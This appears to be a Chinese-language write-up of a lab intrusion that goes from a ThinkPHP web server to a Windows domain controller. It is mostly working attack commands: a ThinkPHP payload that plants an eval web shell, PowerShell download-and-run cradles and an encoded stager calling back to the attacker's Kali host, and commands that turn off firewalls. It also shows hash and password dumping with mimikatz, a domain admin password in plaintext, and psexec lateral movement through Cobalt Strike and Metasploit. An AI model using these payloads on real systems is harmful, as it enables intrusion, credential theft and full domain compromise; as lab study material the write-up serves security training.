环境搭建
首先准备两个网卡
给win7配置这两个网卡
给win2008配置网卡3
然后开启win7的phpstudy
攻击机kali ip: 192.168.135.128
win7: 192.168.135.150 192.168.138.136
win2008: 192.168.138.138
外网渗透
信息收集
nmap 192.168.135.150 -T4 -sV
进行端口扫描
发现80端口开放字节进行访问
getshell
访问IP的
通过报错查看具体的版本
然后查找可利用的payload,或者利用thinkPHP漏洞利用工具进行getshell
payload
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=…/shell.php&vars[1][]=<?php @eval($_POST['f14g']);?>
上传成功蚁剑连接
成功getshell
内网渗透(cs版)
靶机上线
启动cs
创建一个新的监听器
然后需要生成一个木马,前几个靶场用的都是可执行文件木马,这次使用一下powershell,当然使用可执行文件木马也是可以的
复制powershell payload在蚁剑终端执行
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.135.128:8086/a'))"
cs上面已经上线成功
进入交互设置休眠时间
sleep 2
查看当前用户的权限
当前是管理员权限
利用cs自带提权模块提权到system
成功提权
关闭防火墙
shell netsh advfirewall set allprofiles state off
内网信息收集
通过shell ipconfig可以看出还有另一个网卡
查看当前域内计算机列表
net view
可以看到还存在一台域控DC 192.168.138.138
查看域控列表
net dclist
查看用户列表
net user
查询系统信息
net systeminfo
抓取hash凭证
hashdump
logonpasswords
获得密码
攻击域控DC
直接使用psexec攻击域控
然后DC机器上线
可以导出所有hash
自此两台机器就全部拿下
内网渗透(msf版)
靶机上线
先使用web_delivery模块生成一个powershell payload
use exploit/multi/script/web_delivery
show targets
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.135.128
run
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABpAEwAUQBYAFUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAGkATABRAFgAVQB1AGwAbAApAHsAJABpAEwAUQBYAFUALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsAJABpAEwAUQBYAFUALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQBbAE4AZQB0AC4AQwByAGUAZABlAG4AdABpAGEAbABDAGEAYwBoAGUAXQA6ADoARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwB9ADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAzADUALgAxADIAOAA6ADgAMAA4ADAALwBVAGgAOQBxAGcAagBYAG0ASAAyAHcALwBOAFkATQBnAGsAaABEAFIAbgA1AHkANwAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMwA1AC4AMQAyADgAOgA4ADAAOAAwAC8AVQBoADkAcQBnAGoAWABtAEgAMgB3ACcAKQApADsA
在蚁剑的终端执行该payload
拿到meterpreter
路由转发
由于还存在一个138网段,给这个网段添加路由
run autoroute -s 192.168.138.0/24
run autoroute -p
代理搭建
在攻击机kali上开启frps
./frps -c frps.ini
然后把frp客户端通过meterpreter上传到win7中
先创建frp文件夹
把frp内容上传到新建的frp文件夹中
客户端配置文件内容
然后开启客户端
frpc.exe -c frpc.ini
连接成功
配置proxychains
kiwi模块抓取密码
load kiwi
提示我们是x86但是目前是x64架构,我们需要进行进程迁移,迁移到x64架构的进程上
查看当前进程
ps
选择一个x64进程进行迁移
migrate 488
抓取密码
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords
关闭防火墙
net use \\192.168.138.138\ipc$ "asdASD123!@#" /user:"administrator"
net use
利用sc创建服务来远程关闭DC的防火墙
#创建服务
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
#启动服务
sc \\192.168.138.138 start unablefirewall
psexec模块攻击
use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass asdASD123!@#
set payload windows/meterpreter/bind_tcp
run
攻击成功
参考文章: